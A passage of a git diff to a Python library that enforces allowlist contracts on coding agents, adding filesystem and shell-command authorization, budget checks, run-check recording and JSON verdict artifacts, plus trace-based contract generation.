EffectDeniedError("shell.command", normalized, allowed) + + +def intersect_authorized(parent: EffectsAuthorized, child: EffectsAuthorized) -> EffectsAuthorized: + """Compute intersection of authorized effects (capability attenuation for delegation).""" + + filesystem: Optional[FilesystemAuthorization] = None + if parent.filesystem is not None or child.filesystem is not None: + parent_fs = parent.filesystem or FilesystemAuthorization() + child_fs = child.filesystem or FilesystemAuthorization() + filesystem = FilesystemAuthorization( + read=_intersect_lists(parent_fs.read, child_fs.read), + write=_intersect_lists(parent_fs.write, child_fs.write), + ) -def intersect_authorized( - parent: EffectsAuthorized, child: EffectsAuthorized -) -> EffectsAuthorized: - """Compute intersection of authorized effects (capability attenuation for delegation). - - The child can only use effects that BOTH parent and child authorize. - Uses glob matching: a child pattern is kept only if it matches at least - one parent pattern, or vice versa. 
- """ - - def _intersect_lists(parent_list: List[str], child_list: List[str]) -> List[str]: - result: List[str] = [] - for c in child_list: - if matches_any(c, parent_list) or any( - fnmatch.fnmatch(p, c) for p in parent_list - ): - result.append(c) - return result + shell: Optional[ShellAuthorization] = None + if parent.shell is not None or child.shell is not None: + parent_shell = parent.shell or ShellAuthorization() + child_shell = child.shell or ShellAuthorization() + shell = ShellAuthorization(commands=_intersect_lists(parent_shell.commands, child_shell.commands)) return EffectsAuthorized( tools=_intersect_lists(parent.tools, child.tools), network=_intersect_lists(parent.network, child.network), state_writes=_intersect_lists(parent.state_writes, child.state_writes), + filesystem=filesystem, + shell=shell, ) @@ -140,10 +270,7 @@ def _union_unique(x: List[str], y: List[str]) -> List[str]: def validate_declared_subset( declared: EffectsDeclared, authorized: EffectsAuthorized ) -> List[str]: - """Validate that declared effects are a subset of authorized effects. - - Returns a list of violation messages. Empty = valid. - """ + """Validate that declared effects are a subset of authorized effects.""" violations: List[str] = [] for tool in declared.tools: if not matches_any(tool, authorized.tools): diff --git a/src/agent_contracts/enforcer.py b/src/agent_contracts/enforcer.py index 941dbc3..0a73daf 100644 --- a/src/agent_contracts/enforcer.py +++ b/src/agent_contracts/enforcer.py @@ -1,26 +1,24 @@ -"""Runtime enforcement middleware — the unified enforcement layer. -Wires together effects, budgets, postconditions, and violations into a -single enforcement flow. Supports three usage patterns: - -1. Decorator: @enforce_contract("path/to/contract.yaml") -2. Context manager: with ContractEnforcer(contract) as enforcer: ... -3. 
Explicit API: enforcer.check_tool_call(name, args) -""" +"""Runtime enforcement middleware for repo-local coding-agent contracts.""" from __future__ import annotations import functools import inspect +import json +import uuid +from dataclasses import dataclass, field +from datetime import datetime, timezone from pathlib import Path -from typing import Any, Callable, Dict, List, Optional, TypeVar, Union +from typing import Any, Callable, Dict, List, Literal, Optional, TypeVar, Union, cast import jsonschema -from agent_contracts.budgets import BudgetExceededError, BudgetTracker +from agent_contracts.budgets import BudgetExceededError, BudgetSnapshot, BudgetTracker from agent_contracts.effects import EffectGuard from agent_contracts.loader import load_contract from agent_contracts.postconditions import ( + PostconditionError, PostconditionResult, PreconditionError, PreconditionResult, @@ -31,6 +29,79 @@ from agent_contracts.violations import ViolationEmitter, ViolationEvent F = TypeVar("F", bound=Callable[..., Any]) +CheckStatus = Literal["pass", "warn", "fail", "blocked", "skipped"] + + +@dataclass(frozen=True) +class RunCheckResult: + """Result for a named repo check or final gate check.""" + + name: str + status: CheckStatus + required: bool = True + exit_code: Optional[int] = None + detail: Optional[str] = None + evidence: Dict[str, Any] = field(default_factory=dict) + + def to_dict(self) -> Dict[str, Any]: + data: Dict[str, Any] = { + "name": self.name, + "status": self.status, + "required": self.required, + } + if self.exit_code is not None: + data["exit_code"] = self.exit_code + if self.detail is not None: + data["detail"] = self.detail + if self.evidence: + data["evidence"] = self.evidence + return data + + def to_context(self) -> Dict[str, Any]: + return { + "status": self.status, + "required": self.required, + "exit_code": self.exit_code, + "detail": self.detail, + } + + +@dataclass(frozen=True) +class RunVerdict: + """Durable verdict artifact for a 
contract-governed run.""" + + run_id: str + contract: Dict[str, Any] + host: Dict[str, Any] + outcome: Literal["pass", "warn", "blocked", "fail"] + final_gate: Literal["allowed", "blocked", "failed"] + violations: List[Dict[str, Any]] + checks: List[RunCheckResult] + budgets: Dict[str, Any] + artifacts: Dict[str, Any] + timestamp: str + warnings: List[str] = field(default_factory=list) + + def to_dict(self) -> Dict[str, Any]: + return { + "run_id": self.run_id, + "contract": self.contract, + "host": self.host, + "outcome": self.outcome, + "final_gate": self.final_gate, + "violations": self.violations, + "checks": [check.to_dict() for check in self.checks], + "budgets": self.budgets, + "artifacts": self.artifacts, + "timestamp": self.timestamp, + "warnings": self.warnings, + } + + def write_json(self, destination: Union[str, Path]) -> Path: + path = Path(destination) + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text(json.dumps(self.to_dict(), indent=2, sort_keys=True), encoding="utf-8") + return path class ContractViolation(Exception): @@ -41,12 +112,13 @@ def __init__(self, message: str, event: Optional[ViolationEvent] = None) -> None self.event = event -class ContractEnforcer: - """Unified runtime enforcement for an agent contract. +def load_verdict_artifact(source: Union[str, Path]) -> Dict[str, Any]: + """Load a JSON verdict artifact from disk.""" + return cast(Dict[str, Any], json.loads(Path(source).read_text(encoding="utf-8"))) - Enforces effects (default-deny), budgets (circuit breaker), - input/output schema validation, and postconditions. 
- """ + +class ContractEnforcer: + """Unified runtime enforcement for an agent contract.""" def __init__( self, @@ -55,14 +127,37 @@ def __init__( violation_destination: str = "stdout", violation_callback: Optional[Callable[[ViolationEvent], None]] = None, cost_callback: Optional[Callable[[], float]] = None, + repo_root: Optional[Union[str, Path]] = None, + host_name: str = "unknown", + host_version: Optional[str] = None, + run_id: Optional[str] = None, ) -> None: self._contract = contract - self._effect_guard = EffectGuard(contract.effects_authorized) + self._repo_root = self._resolve_repo_root(repo_root) + self._effect_guard = EffectGuard(contract.effects_authorized, repo_root=self._repo_root) self._budget_tracker = BudgetTracker(contract.budgets, cost_callback=cost_callback) self._emitter = ViolationEmitter( destination=violation_destination, callback=violation_callback ) self._warnings: List[str] = [] + self._checks: Dict[str, RunCheckResult] = {} + self._run_id = run_id or str(uuid.uuid4()) + self._host_name = host_name + self._host_version = host_version + self._blocked = False + self._postcondition_failure: Optional[PostconditionError] = None + self._postconditions_evaluated = False + self._last_output: Any = None + self._last_extra_context: Optional[Dict[str, Any]] = None + self._finalized_verdict: Optional[RunVerdict] = None + self._artifact_path: Optional[Path] = None + + def _resolve_repo_root(self, repo_root: Optional[Union[str, Path]]) -> Path: + if repo_root is not None: + return Path(repo_root).resolve() + if self._contract.source_path is not None: + return Path(self._contract.source_path).resolve().parent + return Path.cwd().resolve() @property def contract(self) -> Contract: @@ -80,183 +175,441 @@ def violations(self) -> List[ViolationEvent]: def warnings(self) -> List[str]: return list(self._warnings) - # --- Precondition evaluation --- + @property + def checks(self) -> List[RunCheckResult]: + return list(self._checks.values()) - def 
check_preconditions(self, input_data: Any) -> List[PreconditionResult]: - """Evaluate preconditions against input data before agent runs. + @property + def run_id(self) -> str: + return self._run_id + + @property + def artifact_path(self) -> Optional[Path]: + return self._artifact_path - Raises ContractViolation if any precondition fails. - Returns empty list if no preconditions are defined. - """ + @property + def finalized_verdict(self) -> Optional[RunVerdict]: + return self._finalized_verdict + + def _check_context(self) -> Dict[str, Dict[str, Any]]: + return {name: result.to_context() for name, result in self._checks.items()} + + def _record_blocked_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + message: str, + severity: str = "critical", + ) -> None: + self._blocked = True + event = self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="blocked", + ) + raise ContractViolation(message, event=event) + + def _record_failed_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + severity: str = "critical", + ) -> None: + self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="failed", + ) + + def _record_warn_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + severity: str = "major", + ) -> None: + self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="warned", + ) + + def check_preconditions(self, input_data: Any) -> List[PreconditionResult]: if not self._contract.preconditions: return [] try: return evaluate_preconditions( self._contract.preconditions, input_data, 
raise_on_failure=True ) - except PreconditionError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"inputs.preconditions.{e.precondition.name}", - evidence={"check": e.precondition.check}, - severity="critical", - enforcement="blocked", + except PreconditionError as exc: + self._record_blocked_event( + clause=f"inputs.preconditions.{exc.precondition.name}", + evidence={"check": exc.precondition.check}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - - # --- Input validation --- + raise AssertionError("unreachable") def validate_input(self, input_data: Any) -> List[str]: - """Validate input against the contract's input schema. - - Returns list of validation errors. Raises ContractViolation - if schema validation fails and enforcement is sync_block. - """ if self._contract.input_schema is None: return [] validator = jsonschema.Draft202012Validator(self._contract.input_schema) errors = [e.message for e in validator.iter_errors(input_data)] if errors: - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="inputs.schema", - evidence={"errors": errors, "input_keys": list(input_data.keys()) if isinstance(input_data, dict) else str(type(input_data))}, - severity="major", - enforcement="blocked", + self._record_warn_event( + clause="inputs.schema", + evidence={ + "errors": errors, + "input_type": type(input_data).__name__, + }, ) return errors - # --- Tool call interception --- - def check_tool_call(self, tool_name: str, args: Optional[Dict[str, Any]] = None) -> None: - """Check if a tool call is authorized and within budget. - - Raises ContractViolation if the tool is denied or budget exceeded. 
- """ - # Effect check + del args if not self._effect_guard.check_tool(tool_name): - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="effects.authorized.tools", - evidence={"tool": tool_name, "authorized": self._contract.effects_authorized.tools if self._contract.effects_authorized else []}, - severity="critical", - enforcement="blocked", + self._record_blocked_event( + clause="effects.authorized.tools", + evidence={ + "tool": tool_name, + "authorized": self._contract.effects_authorized.tools + if self._contract.effects_authorized + else [], + }, + message=f"Tool '{tool_name}' not authorized by contract.", + ) + try: + self._budget_tracker.record_tool_call() + except BudgetExceededError as exc: + self._record_blocked_event( + clause=f"resources.budgets.max_{exc.budget_type}" + if exc.budget_type == "tool_calls" + else f"resources.budgets.{exc.budget_type}", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation( - f"Tool '{tool_name}' not authorized by contract.", event=event + + def check_network_request(self, url: str) -> None: + if not self._effect_guard.check_network(url): + self._record_blocked_event( + clause="effects.authorized.network", + evidence={ + "url": url, + "authorized": self._contract.effects_authorized.network + if self._contract.effects_authorized + else [], + }, + message=f"Network request '{url}' not authorized by contract.", + ) + + def check_state_write(self, scope: str) -> None: + if not self._effect_guard.check_state_write(scope): + self._record_blocked_event( + clause="effects.authorized.state_writes", + evidence={ + "scope": scope, + "authorized": self._contract.effects_authorized.state_writes + if self._contract.effects_authorized + else [], + }, + message=f"State write '{scope}' not authorized by contract.", + ) + + def check_file_read(self, path: Union[str, Path]) -> None: + candidate = 
str(path) + if not self._effect_guard.check_file_read(candidate): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.filesystem is not None + ): + patterns = self._contract.effects_authorized.filesystem.read + self._record_blocked_event( + clause="effects.authorized.filesystem.read", + evidence={"path": candidate, "authorized": patterns}, + message=f"File read '{candidate}' not authorized by contract.", + ) + + def check_file_write(self, path: Union[str, Path]) -> None: + candidate = str(path) + if not self._effect_guard.check_file_write(candidate): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.filesystem is not None + ): + patterns = self._contract.effects_authorized.filesystem.write + self._record_blocked_event( + clause="effects.authorized.filesystem.write", + evidence={"path": candidate, "authorized": patterns}, + message=f"File write '{candidate}' not authorized by contract.", ) - # Budget check — record the tool call + def check_shell_command(self, command: str) -> None: + if not self._effect_guard.check_shell_command(command): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.shell is not None + ): + patterns = self._contract.effects_authorized.shell.commands + self._record_blocked_event( + clause="effects.authorized.shell.commands", + evidence={"command": command, "authorized": patterns}, + message=f"Shell command '{command}' not authorized by contract.", + ) try: - self._budget_tracker.record_tool_call() - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"resources.budgets.{e.budget_type}", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + 
self._budget_tracker.record_shell_command() + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_shell_commands", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e def add_cost(self, amount: float) -> None: - """Record cost and check against budget limit.""" try: self._budget_tracker.add_cost(amount) - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_cost_usd", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_cost_usd", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e def add_tokens(self, count: int) -> None: - """Record token usage and check against budget limit.""" try: self._budget_tracker.add_tokens(count) - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_tokens", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_tokens", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - - # --- Output validation --- def validate_output(self, output_data: Any) -> List[str]: - """Validate output against the contract's output schema.""" if self._contract.output_schema is None: return [] validator = jsonschema.Draft202012Validator(self._contract.output_schema) errors = [e.message 
for e in validator.iter_errors(output_data)] if errors: - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="outputs.schema", + self._warnings.append(f"Output validation warnings: {errors}") + self._record_warn_event( + clause="outputs.schema", evidence={"errors": errors}, - severity="major", - enforcement="warned", ) return errors - # --- Postcondition evaluation --- - - def evaluate_postconditions(self, output: Any) -> List[PostconditionResult]: - """Evaluate all postconditions against the output.""" - - def on_warn(pc: Any, o: Any) -> None: - msg = f"Postcondition '{pc.name}' failed (sync_warn)" - self._warnings.append(msg) - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"contract.postconditions.{pc.name}", - evidence={"check": pc.check, "output_type": str(type(o).__name__)}, - severity=pc.severity, - enforcement="warned", + def evaluate_postconditions( + self, + output: Any, + *, + extra_context: Optional[Dict[str, Any]] = None, + ) -> List[PostconditionResult]: + self._last_output = output + self._last_extra_context = extra_context + merged_context: Dict[str, Any] = {"checks": self._check_context()} + if extra_context: + merged_context.update(extra_context) + + def on_warn(postcondition: Any, _: Any) -> None: + message = f"Postcondition '{postcondition.name}' failed (sync_warn)" + self._warnings.append(message) + self._record_warn_event( + clause=f"contract.postconditions.{postcondition.name}", + evidence={ + "check": postcondition.check, + "checks": self._check_context(), + }, + severity=postcondition.severity, ) - return evaluate_postconditions( - self._contract.postconditions, output, on_warn=on_warn - ) + results: List[PostconditionResult] + try: + results = evaluate_postconditions( + self._contract.postconditions, + output, + extra_context=merged_context, + 
on_warn=on_warn, + ) + except PostconditionError as exc: + self._postconditions_evaluated = True + self._postcondition_failure = exc + self._record_failed_event( + clause=f"contract.postconditions.{exc.postcondition.name}", + evidence={ + "check": exc.postcondition.check, + "checks": self._check_context(), + "output_type": type(output).__name__, + }, + severity=exc.postcondition.severity, + ) + raise + self._postconditions_evaluated = True + return results - # --- Duration check --- + def record_check( + self, + name: str, + status: CheckStatus, + *, + exit_code: Optional[int] = None, + detail: Optional[str] = None, + required: bool = True, + evidence: Optional[Dict[str, Any]] = None, + ) -> RunCheckResult: + allowed: List[str] = ["pass", "warn", "fail", "blocked", "skipped"] + if status not in allowed: + raise ValueError(f"Unsupported check status: {status}") + result = RunCheckResult( + name=name, + status=status, + required=required, + exit_code=exit_code, + detail=detail, + evidence=evidence or {}, + ) + self._checks[name] = result + if status == "warn": + self._warnings.append(f"Check '{name}' reported warning") + return result def check_duration(self) -> None: - """Check elapsed time against budget limit.""" try: self._budget_tracker.check_duration() - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_duration_seconds", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_duration_seconds", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - # --- Context manager --- + def _default_artifact_path(self) -> str: + return ".agent-contracts/runs/{run_id}/verdict.json" + + def 
_resolved_artifact_path(self, artifact_path: Optional[Union[str, Path]]) -> Path: + raw = ( + str(artifact_path) + if artifact_path is not None + else ( + self._contract.observability.run_artifact_path + if self._contract.observability and self._contract.observability.run_artifact_path + else self._default_artifact_path() + ) + ) + formatted = raw.format(run_id=self._run_id) + path = Path(formatted) + if not path.is_absolute(): + path = self._repo_root / path + return path.resolve() + + def _snapshot_budgets(self) -> Dict[str, Any]: + snapshot: BudgetSnapshot = self._budget_tracker.snapshot() + return { + "cost_usd": snapshot.cost_usd, + "tokens": snapshot.tokens, + "tool_calls": snapshot.tool_calls, + "shell_commands": snapshot.shell_commands, + "duration_seconds": snapshot.elapsed_seconds, + } + + def finalize_run( + self, + *, + output: Any = None, + extra_context: Optional[Dict[str, Any]] = None, + artifact_path: Optional[Union[str, Path]] = None, + execution_error: Optional[BaseException] = None, + ) -> RunVerdict: + if self._finalized_verdict is not None and artifact_path is None: + return self._finalized_verdict + + if isinstance(execution_error, PostconditionError) and self._postcondition_failure is None: + self._postcondition_failure = execution_error + self._record_failed_event( + clause=f"contract.postconditions.{execution_error.postcondition.name}", + evidence={"check": execution_error.postcondition.check}, + severity=execution_error.postcondition.severity, + ) + if isinstance(execution_error, ContractViolation): + self._blocked = True + + candidate_output = self._last_output if output is None else output + if candidate_output is not None and not self._postconditions_evaluated: + try: + self.evaluate_postconditions(candidate_output, extra_context=extra_context) + except PostconditionError: + pass + + required_check_failure = any( + check.required and check.status in {"fail", "blocked"} + for check in self._checks.values() + ) + warning_present = 
any(check.status == "warn" for check in self._checks.values()) or bool( + self._warnings + ) + unexpected_error = ( + execution_error is not None + and not isinstance(execution_error, (ContractViolation, PostconditionError)) + ) + + if self._blocked: + outcome: Literal["pass", "warn", "blocked", "fail"] = "blocked" + final_gate: Literal["allowed", "blocked", "failed"] = "blocked" + elif self._postcondition_failure is not None or required_check_failure or unexpected_error: + outcome = "fail" + final_gate = "failed" + elif warning_present: + outcome = "warn" + final_gate = "allowed" + else: + outcome = "pass" + final_gate = "allowed" + + self._artifact_path = self._resolved_artifact_path(artifact_path) + timestamp = datetime.now(timezone.utc).isoformat() + contract_path = self._contract.source_path + artifacts: Dict[str, Any] = {"verdict_path": str(self._artifact_path)} + if contract_path is not None: + artifacts["contract_path"] = contract_path + + verdict = RunVerdict( + run_id=self._run_id, + contract={ + "name": self._contract.identity.name, + "version": self._contract.identity.version, + "spec_version": self._contract.spec_version, + }, + host={"name": self._host_name, "version": self._host_version}, + outcome=outcome, + final_gate=final_gate, + violations=[event.to_dict() for event in self.violations], + checks=self.checks, + budgets=self._snapshot_budgets(), + artifacts=artifacts, + timestamp=timestamp, + warnings=self.warnings, + ) + verdict.write_json(self._artifact_path) + self._finalized_verdict = verdict + return verdict def __enter__(self) -> "ContractEnforcer": return self def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None: - pass + if self._finalized_verdict is None: + self.finalize_run(execution_error=exc_val) def enforce_contract( @@ -265,14 +618,7 @@ def enforce_contract( violation_destination: str = "stdout", strict: bool = True, ) -> Callable[[F], F]: - """Decorator that wraps a function with contract enforcement. 
- - The decorated function receives a `_enforcer` keyword argument - providing the ContractEnforcer instance for tool call checks. - - Input validation runs before the function. - Output validation and postconditions run after. - """ + """Decorator that wraps a function with contract enforcement.""" contract = load_contract(source, strict=strict) def decorator(fn: F) -> F: @@ -281,37 +627,34 @@ def wrapper(*args: Any, **kwargs: Any) -> Any: enforcer = ContractEnforcer( contract, violation_destination=violation_destination ) - # Only inject _enforcer if the function accepts it sig = inspect.signature(fn) if "_enforcer" in sig.parameters or any( - p.kind == inspect.Parameter.VAR_KEYWORD for p in sig.parameters.values() + param.kind == inspect.Parameter.VAR_KEYWORD + for param in sig.parameters.values() ): kwargs["_enforcer"] = enforcer - # Pre: validate input if first positional arg is present - if args and contract.input_schema is not None: - errors = enforcer.validate_input(args[0]) - if errors: - raise ContractViolation( - f"Input validation failed: {errors}" - ) - - # Pre: evaluate preconditions - if args and contract.preconditions: - enforcer.check_preconditions(args[0]) + try: + if args and contract.input_schema is not None: + errors = enforcer.validate_input(args[0]) + if errors: + enforcer._blocked = True + raise ContractViolation(f"Input validation failed: {errors}") - result = fn(*args, **kwargs) + if args and contract.preconditions: + enforcer.check_preconditions(args[0]) - # Post: validate output - if contract.output_schema is not None: - errors = enforcer.validate_output(result) - if errors: - enforcer._warnings.append(f"Output validation warnings: {errors}") + result = fn(*args, **kwargs) - # Post: evaluate postconditions - enforcer.evaluate_postconditions(result) + if contract.output_schema is not None: + enforcer.validate_output(result) - return result + enforcer.evaluate_postconditions(result) + enforcer.finalize_run(output=result) + return result + 
except Exception as exc: + enforcer.finalize_run(execution_error=exc) + raise return wrapper # type: ignore[return-value] diff --git a/src/agent_contracts/init_from_trace.py b/src/agent_contracts/init_from_trace.py index 7d55da6..077f9fd 100644 --- a/src/agent_contracts/init_from_trace.py +++ b/src/agent_contracts/init_from_trace.py @@ -1,58 +1,168 @@ -"""Generate contract skeletons from execution traces. -Reads JSONL trace files and infers: -- Identity from agent metadata -- Tool allowlist from observed tool calls -- Budget estimates from observed resource usage -- Postcondition candidates from output patterns -""" +"""Generate coding-agent contract skeletons from execution traces.""" from __future__ import annotations import json -from pathlib import Path -from typing import Any, Dict, List, Optional, Set, Union +from pathlib import Path, PurePosixPath +from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union, cast import yaml def _read_traces(source: Union[str, Path]) -> List[Dict[str, Any]]: - """Read JSONL trace file, returning list of trace entries.""" path = Path(source) traces: List[Dict[str, Any]] = [] - with open(path, encoding="utf-8") as f: - for _line_num, line in enumerate(f, 1): + with open(path, encoding="utf-8") as handle: + for line in handle: line = line.strip() if not line: continue try: - traces.append(json.loads(line)) + payload = json.loads(line) except json.JSONDecodeError: - pass # Skip malformed lines + continue + if isinstance(payload, dict): + traces.append(payload) return traces +def _iter_events(trace: Dict[str, Any]) -> Iterable[Dict[str, Any]]: + yield trace + events = trace.get("events", []) + if isinstance(events, list): + for event in events: + if isinstance(event, dict): + yield event + + def _extract_tools(traces: List[Dict[str, Any]]) -> List[str]: - """Extract unique tool names from traces.""" tools: Set[str] = set() for trace in traces: - # Support various trace formats - if "tool_calls" in trace: - for tc in 
trace["tool_calls"]: - name = tc.get("name") or tc.get("tool") or tc.get("function", {}).get("name") + for entry in _iter_events(trace): + tool_calls = entry.get("tool_calls", []) + if isinstance(tool_calls, list): + for tool_call in tool_calls: + if isinstance(tool_call, dict): + name = tool_call.get("name") or tool_call.get("tool") + if name: + tools.add(str(name)) + if entry.get("type") == "tool_call": + name = entry.get("name") or entry.get("tool_name") if name: - tools.add(name) - if "tool" in trace and "name" in trace: - tools.add(trace["name"]) - if "type" in trace and trace["type"] == "tool_call": - name = trace.get("name") or trace.get("tool_name") - if name: - tools.add(name) + tools.add(str(name)) return sorted(tools) -def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: - """Estimate budget limits from observed resource usage (with 20% headroom).""" +def _extract_network(traces: List[Dict[str, Any]]) -> List[str]: + urls: Set[str] = set() + for trace in traces: + for entry in _iter_events(trace): + for key in ("url", "endpoint"): + value = entry.get(key) + if isinstance(value, str) and value.startswith(("http://", "https://")): + urls.add(value) + requests = entry.get("network_requests", []) + if isinstance(requests, list): + for request in requests: + if isinstance(request, dict): + url = request.get("url") + if isinstance(url, str): + urls.add(url) + return sorted(urls) + + +def _normalize_path(path: str) -> Optional[str]: + candidate = path.strip() + if not candidate: + return None + posix = PurePosixPath(candidate.lstrip("./")) + if str(posix) == ".": + return None + return posix.as_posix() + + +def _infer_globs(paths: Set[str]) -> List[str]: + patterns: Set[str] = set() + for path in paths: + normalized = _normalize_path(path) + if normalized is None: + continue + parts = PurePosixPath(normalized).parts + if len(parts) <= 1: + patterns.add(normalized) + else: + patterns.add(f"{parts[0]}/**") + return sorted(patterns) + + +def 
_extract_filesystem(traces: List[Dict[str, Any]]) -> Dict[str, List[str]]: + read_paths: Set[str] = set() + write_paths: Set[str] = set() + for trace in traces: + for entry in _iter_events(trace): + filesystem = entry.get("filesystem") + if isinstance(filesystem, dict): + for value in filesystem.get("read", []): + if isinstance(value, str): + read_paths.add(value) + for value in filesystem.get("write", []): + if isinstance(value, str): + write_paths.add(value) + for key in ("file_reads", "files_read", "read_paths"): + values = entry.get(key, []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + read_paths.add(value) + for key in ("file_writes", "files_written", "write_paths"): + values = entry.get(key, []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + write_paths.add(value) + event_type = entry.get("type") + path_value = entry.get("path") + if isinstance(path_value, str): + if event_type in {"file_read", "filesystem.read"}: + read_paths.add(path_value) + if event_type in {"file_write", "filesystem.write"}: + write_paths.add(path_value) + result: Dict[str, List[str]] = {} + read_globs = _infer_globs(read_paths) + write_globs = _infer_globs(write_paths) + if read_globs: + result["read"] = read_globs + if write_globs: + result["write"] = write_globs + return result + + +def _extract_shell_commands(traces: List[Dict[str, Any]]) -> Tuple[List[str], int]: + commands: Set[str] = set() + max_count = 0 + for trace in traces: + count = 0 + for entry in _iter_events(trace): + values = entry.get("shell_commands", []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + commands.add(" ".join(value.strip().split())) + count += 1 + elif isinstance(value, dict) and isinstance(value.get("command"), str): + commands.add(" ".join(value["command"].strip().split())) + count += 1 + event_type = entry.get("type") + command = entry.get("command") + if event_type in {"shell", 
"shell_command", "command"} and isinstance(command, str): + commands.add(" ".join(command.strip().split())) + count += 1 + max_count = max(max_count, count) + return sorted(commands), max_count + + +def _extract_budgets(traces: List[Dict[str, Any]], max_shell_commands: int) -> Dict[str, Any]: max_cost = 0.0 max_tokens = 0 max_tool_calls = 0 @@ -64,11 +174,10 @@ def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: tokens = usage.get("total_tokens", 0) or trace.get("total_tokens", 0) tool_calls = len(trace.get("tool_calls", [])) duration = trace.get("duration_seconds", 0) or (trace.get("latency_ms") or 0) / 1000 - - max_cost = max(max_cost, cost) - max_tokens = max(max_tokens, tokens) - max_tool_calls = max(max_tool_calls, tool_calls) - max_duration = max(max_duration, duration) + max_cost = max(max_cost, float(cost or 0)) + max_tokens = max(max_tokens, int(tokens or 0)) + max_tool_calls = max(max_tool_calls, int(tool_calls)) + max_duration = max(max_duration, float(duration or 0)) budgets: Dict[str, Any] = {} if max_cost > 0: @@ -79,23 +188,22 @@ def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: budgets["max_tool_calls"] = int(max_tool_calls * 1.2) + 1 if max_duration > 0: budgets["max_duration_seconds"] = round(max_duration * 1.2, 1) - + if max_shell_commands > 0: + budgets["max_shell_commands"] = int(max_shell_commands * 1.2) + 1 return budgets def _extract_identity(traces: List[Dict[str, Any]]) -> Dict[str, str]: - """Extract agent identity from traces.""" for trace in traces: agent = trace.get("agent", {}) if isinstance(agent, dict): name = agent.get("name") version = agent.get("version") if name: - return {"name": name, "version": version or "0.1.0"} + return {"name": str(name), "version": str(version or "0.1.0")} agent_name = trace.get("agent_name") or trace.get("agent_id") if agent_name: - return {"name": agent_name, "version": "0.1.0"} - + return {"name": str(agent_name), "version": "0.1.0"} return {"name": 
"unnamed-agent", "version": "0.1.0"} @@ -105,12 +213,7 @@ def generate_contract_from_traces( agent_name: Optional[str] = None, agent_version: Optional[str] = None, ) -> Dict[str, Any]: - """Generate a contract skeleton from execution traces. - - Returns a dict ready to be serialized as YAML. - """ traces = _read_traces(source) - identity = _extract_identity(traces) if agent_name: identity["name"] = agent_name @@ -118,7 +221,10 @@ def generate_contract_from_traces( identity["version"] = agent_version tools = _extract_tools(traces) - budgets = _extract_budgets(traces) + network = _extract_network(traces) + filesystem = _extract_filesystem(traces) + shell_commands, max_shell_commands = _extract_shell_commands(traces) + budgets = _extract_budgets(traces, max_shell_commands) contract: Dict[str, Any] = { "agent_contract": "0.1.0", @@ -134,21 +240,23 @@ def generate_contract_from_traces( } ] }, + "observability": { + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json" + }, } - # Tier 1 fields (if we have data) - if tools: - contract["effects"] = { - "authorized": { - "tools": tools, - "network": [], - "state_writes": [], - } - } - + authorized: Dict[str, Any] = { + "tools": tools, + "network": network, + "state_writes": [], + } + if filesystem: + authorized["filesystem"] = filesystem + if shell_commands: + authorized["shell"] = {"commands": shell_commands} + contract["effects"] = {"authorized": authorized} if budgets: contract["resources"] = {"budgets": budgets} - return contract @@ -158,8 +266,7 @@ def 